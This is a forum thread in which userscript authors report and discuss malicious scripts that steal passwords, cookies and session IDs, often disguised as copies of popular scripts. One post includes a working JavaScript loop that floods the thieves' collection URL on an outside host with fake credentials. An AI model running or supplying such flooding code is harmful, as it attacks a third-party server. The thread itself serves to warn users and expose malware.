sizzlemctwizzle
Scriptwright
  |
Daren wrote:The problem will always exist. The only solution would be setting up a review system like the one mozilla does for addons, but that would be more hassle than its worth. Your best option is to trust the community to report scripts that are malicious. Also you could just only install popular scripts(lots of downloads, fans, high ratings, and discussions) since they are less likely to be malicious. Also if a scriptwright has one of these popular scripts, it's probably safe to assume his other scripts are safe. Just be a vigilant/smart user basically. Daren wrote:Yeah I don't know why the one's that have been identified haven't been removed. |
used-car-parts
User
 |
Newbie here. The review system sounds good. I've seen several good sites do that and it's a great way to let people know the pros and cons of the script. |
donovan1974@...
User
|
ghhhhhhhhhhhb |
Marti
Scriptwright
 |
This user in this script claims stealing of site related passwords. So far from what I can tell none of the scripts posted by this user are his and may be "dirty". |
Luzifull22
User
 |
yess OL Thankss! |
|
Marti
Scriptwright
|
This user in this script with this version includes a @require to a questionable script with this version that appears to compromise identity and privacy by canvasing a google page that has been provided by Google, Inc. specifically for this purpose. Used in combination with this addon on AMO along with Greasemonkey. This "feature" (a complicated web-bug) is undocumented on all of the script/add-on homepages. Jesse Andrews wrote:I recommend this even for older scripts too... good advice! :) |
|
Marti
Scriptwright
|
SuperCanan posted this |
|
Marti
Scriptwright
|
Melkor posted La Larva posted this malware with this version This one also has similar review... call to server doesn't appear to be present but sessionid does appear to be sent elsewhere. These two will probably need some indepth examination. |
ameboide
Scriptwright
|
Marti wrote:Good to see that the script was removed, but why wasn't the user banned? If distributing obvious malware isn't worth an instant ban, what is? And not only that, but just a quick look at his other scripts shows that all of them do the same (I presume it's even the same code that was present in the deleted script) |
Jefferson Scher
Scriptwright
|
3ICE posted about another one:
Someone stole my script and inserted malicious code into it. 56 people affected. Suspect script: Youtube Link OptimizerX I added a couple of discussions there. |
Cletus
Scriptwright
|
Jefferson Scher wrote:Seems like it is more than just that one. Here is a customized search that catches a total of 31 scripts that have that chunk of code in it: http://userscripts.org/search... Edit: here are clickable links to make it a bit easier to keep track of. http://userscripts.org/scripts/review/117369
|
|
sizzlemctwizzle
Scriptwright
|
@Cletus You link doesn't work. Here's a Google search that returns 31 results. |
|
Jefferson Scher
Scriptwright
|
This is why everyone should run NoScript. (If you can tolerate constantly investigating and approving things. Maybe even if you can't...) |
|
Cletus
Scriptwright
|
sizzlemctwizzle wrote:Whoops, fixed. |
|
Marti
Scriptwright
|
ameboide wrote:It is possible that the respective users deleted their scripts too... but as far as banning goes related to these... this is newer territory... I don't know what the general consensus on appropriate actions is yet... till then I'll report and recheck occasionally. |
cqrt
Scriptwright
|
This script caught my attention as it is using, verbatim, the description for my popular Google Reader Sanity userscript. It's called Google Reader by user vdk and it's source code reveals that it is the complete uncompressed source of jQuery and nothing else except for some additional foreign code at the bottom. I'm aware of the totalfilehosters.co.uk cookie stealing userscript, but this seems to be something different, loading code from 'http://aspspider.net' which is 'free' ASP hosting, can anybody identify what it's doing? The same author also has the same code in this script. |
|
Jefferson Scher
Scriptwright
|
cqrt wrote:I don't use jQuery, but this syntax should find all of the <input type="password"> in the document:
That, plus posting it to some site other than the site the user is visiting, is all I think one needs to know about this script! I posted a Discussion on each of the two scripts, and voted it harmful. I suppose for greater visibility, they need bad reviews... |
|
Marti
Scriptwright
|
vdk posted this malware with this version.
vdk posted this malware with this version. Script needlessly runs on all pages and potentially steals DOM inserted user/passes. |
|
ameboide
Scriptwright
|
Jefferson Scher wrote:No, they need to be deleted and the user(s) permanently banned. I really don't understand what's to ponder about this. Spammers get promptly (sort of) banned for posting useless links in the forums; yet users who maliciously release obvious malware, steal cookies and passwords from unaware people, and even do so disguising it as other people's scripts, receive no sanction at all, and their harmful scripts remain there to be installed.
|
|
Jefferson Scher
Scriptwright
|
ameboide wrote:Yes, that's true. I was referring to what we non-admins could do ourselves.Jefferson Scher wrote:No, they need to be deleted and the user(s) permanently banned. |
|
ameboide
Scriptwright
|
I'll just leave this here...
var c = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
var cl = c.length;
function rand() {
var l = 6 + Math.random()*6;
var rand = '';
for (var i=0; i<l; i++) rand += c.charAt(Math.random() * cl);
return rand;
}
var hosts = ["www.facebook.com", "twitter.com", "mail.google.com"];
var xmlHttp = new XMLHttpRequest();
var n = 1000;
while(n--){
var userName = rand();
var passWord = rand();
var hostLocation = hosts[Math.floor(Math.random()*3)];
xmlHttp.open("POST","http://aspspider.net/abc123abc/Default.aspx?Account=" + "host: " + hostLocation + " " + "username: " + userName + " " + "password: " + passWord, false);
xmlHttp.send();
}
|
|
Marti
Scriptwright
|
@ameboide, I understand your concern quite well. You need to give the other admins time to investigate and if you reread this post you might understand a little bit more about identity theft. I don't have all the necessary time to check every post and script on USO myself but when cqrt posted the reviews I caught it immediately and did my part... the more appropriate attention that is drawn to an issue the more the community can interact with it so the appropriate people can make an informed decision. We all can't be online 24x7 so it is a teamwork effort and some of us only get paid for our day jobs. :P ;) I've already been seeing cookies altered but not transmitted as of late and some of those scripts are valid. uso - Count Issues for example is a cautionary script notification system to alert a potential end-user installer that there MIGHT be an issue... sometimes there isn't. Assuming here that you are using Greasefire... I would strongly suggest that you don't click its native install button (This is one my pet peeves with Greasefire but I don't foresee them changing it anytime soon unfortunately.) and go to one of the other links in the browser window that it brings up. This should kick you to the actual browser content window instead so you can review it. :) |
Jawz74
Scriptwright
|
Hi,
@Marti : Concerning the script posted by La Larva, the "DOA Power tool by Teamwork" is using the game server URL taken from the flash parameters to send the requests. In the script, there's only one location where you can find a "new XMLHttpRequest" and the URL used is always composed with the game sever URL. No other request is sent to another server. Regards, |
|
Marti
Scriptwright
|
3lch1M4n posted this malware with this version.
|
pearlheartgtr
User
|
This script, http://userscripts.org/scripts/show/117369 also started a Google Redirect fiasco with adf.ly every time I clicked on something in a search. |
Voices
